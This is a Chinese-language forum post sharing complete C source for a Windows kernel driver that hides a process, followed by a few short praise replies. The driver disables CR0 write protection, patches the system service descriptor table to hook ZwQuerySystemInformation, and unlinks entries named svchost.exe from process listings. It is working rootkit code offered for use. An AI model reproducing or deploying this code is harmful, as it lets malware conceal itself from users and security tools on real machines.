ZwQuerySystemInformation 隐藏程序进程
#include "ntddk.h"#include "string.h"
#define IOCTL_EVENT_MSG CTL_CODE(FILE_DEVICE_UNKNOWN, 0x927, METHOD_BUFFERED , FILE_ANY_ACCESS)
#pragma warning(disable: 4047 4018)
#ifdef __cplusplus
extern "C"
#endif
struct _SYSTEM_THREADS
{
LARGE_INTEGER KernelTime; //内核模式时间计数
LARGE_INTEGER UserTime; //用户模式时间计数
LARGE_INTEGER CreateTime; //创建线程时间
ULONG WaitTime; //等待时间
PVOID StartAddress; //线程起始地址
CLIENT_ID ClientIs; //线程进程ID
KPRIORITY Priority; //优先级
KPRIORITY BasePriority;//基优先级
ULONG ContextSwitchCount;//线程环境切换计数
ULONG ThreadState; //线程状态
KWAIT_REASON WaitReason; //线程等待原因
};
struct _SYSTEM_PROCESSES
{
ULONG NextEntryDelta; //下一个进程信息的偏移量,如果为0表示无一个进程信息
ULONG ThreadCount; //线程数量
ULONG Reserved; //
LARGE_INTEGER CreateTime;//创建进程的时间
LARGE_INTEGER UserTime; //进程中所有线程在用户模式运行时间的总和
LARGE_INTEGER KernelTime; //进程中所有线程在内核模式运行时间的总和
UNICODE_STRING ProcessName; //进程的名字
KPRIORITY BasePriority; //线程的缺省优先级
ULONG ProcessId; //进程ID号
ULONG InheritedFromProcessId; //继承语柄的进程ID号
ULONG HandleCount; //进程打开的语柄数量
ULONG Reserved2; //
VM_COUNTERS VmCounters; //虚拟内存的使用情况统计
IO_COUNTERS IoCounters; //IO操作的统计,Only For 2000
struct _SYSTEM_THREADS Threads;//描述进程中各线程的数组
};
#pragma pack(1)
typedef struct _ServiceDescriptorEntry {
unsigned int *ServiceTableBase; //系统服务数组表
unsigned int *ServiceCounterTableBase; //数组使用计数
unsigned int NumberOfServices; //服务数量
unsigned char *ParamTableBase; //服务参数数目表
}ServiceDescriptorTableEntry, *PServiceDescriptorTableEntry;
#pragma pack()
//系统服务表入口地址
extern PServiceDescriptorTableEntry KeServiceDescriptorTable;
NTSYSAPI
NTSTATUS
NTAPI
ZwQuerySystemInformation(
IN ULONG SystemInformationClass, //查询系统服务类型
IN PVOID SystemInformation, //接收系统信息缓冲区
IN ULONG SystemInformationLength, //接收信息缓冲区大小
OUT PULONG ReturnLength); //实际接收到的大小
typedef NTSTATUS (*REALZWQUERYSYSTEMINFORMATION)
(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
REALZWQUERYSYSTEMINFORMATION RealZwQuerySystemInformation;
UNICODE_STRING hide_process_name;
ULONG CR0VALUE;
NTSTATUS HookZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
VOID DriverUnload (IN PDRIVER_OBJECT pDriverObject);
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
DriverObject->DriverUnload = DriverUnload;
__asm{
mov eax, cr0
mov CR0VALUE, eax
and eax, 0fffeffffh//DisableWriteProtect
mov cr0, eax
}
//取得原来ZwQuerySystemInformation的入口地址
RealZwQuerySystemInformation = (REALZWQUERYSYSTEMINFORMATION)( ((PServiceDescriptorTableEntry)KeServiceDescriptorTable)->ServiceTableBase[*(PULONG)((PUCHAR)ZwQuerySystemInformation+1)] );
//Hook
((PServiceDescriptorTableEntry)KeServiceDescriptorTable)->ServiceTableBase[*(PULONG)((PUCHAR)ZwQuerySystemInformation+1)] = HookZwQuerySystemInformation;
//EnableWriteProtect
__asm
{
mov eax, CR0VALUE
mov cr0, eax
}
DbgPrint(("Driver has been Load !"));
return STATUS_SUCCESS;
}
VOID DriverUnload (IN PDRIVER_OBJECT pDriverObject)
{
__asm{
mov eax, cr0
mov CR0VALUE, eax
and eax, 0fffeffffh//DisableWriteProtect
mov cr0, eax
}
((PServiceDescriptorTableEntry)KeServiceDescriptorTable)->ServiceTableBase[*(PULONG)((PUCHAR)ZwQuerySystemInformation+1)] = RealZwQuerySystemInformation;
//EnableWriteProtect
__asm
{
mov eax, CR0VALUE
mov cr0, eax
}
DbgPrint(("Driver has been Unload !"));
return;
}
NTSTATUS HookZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength)
{
NTSTATUS rc;
struct _SYSTEM_PROCESSES *curr;// 保存上一个进程信息的指针
struct _SYSTEM_PROCESSES *prev = NULL;
RtlInitUnicodeString(&hide_process_name,L"svchost.exe");
rc = (RealZwQuerySystemInformation) (
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength);
if(NT_SUCCESS(rc))
{
if(5 == SystemInformationClass)
{
curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
//struct _SYSTEM_PROCESSES *prev = NULL;
//加第一个偏移量得到第一个system进程的信息首地址
if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);
while(curr)
{
if (RtlCompareUnicodeString(&hide_process_name, &curr->ProcessName, 1) == 0)
{
//找到要隐藏的进程
if(prev)
{
if(curr->NextEntryDelta)
{
//要删除的信息在中间
prev->NextEntryDelta += curr->NextEntryDelta;
}
else
{
//要删除的信息在末尾
prev->NextEntryDelta = 0;
}
}
else
{
if(curr->NextEntryDelta)
{
//要删除的信息在开头
(char *)SystemInformation += curr->NextEntryDelta;
}
else
{
SystemInformation = NULL;
}
}
//如果链下一个还有其他的进程信息,指针往后移
if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);
else
{
curr = NULL;
break;
}
}
if(curr != NULL)
{
//把当前指针设置成前一个指针,当前指针后移
prev = curr;
if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);
else curr = NULL;
}
} // end while(curr)
}
}
return rc;
}
无回帖,不论坛,这才是人道。 一直在看 是爷们的娘们的都帮顶!大力支持 确实不错,顶先 楼主呀,,,您太有才了。。。
确实不错,顶先 回复一下 证明我来过
页:
[1]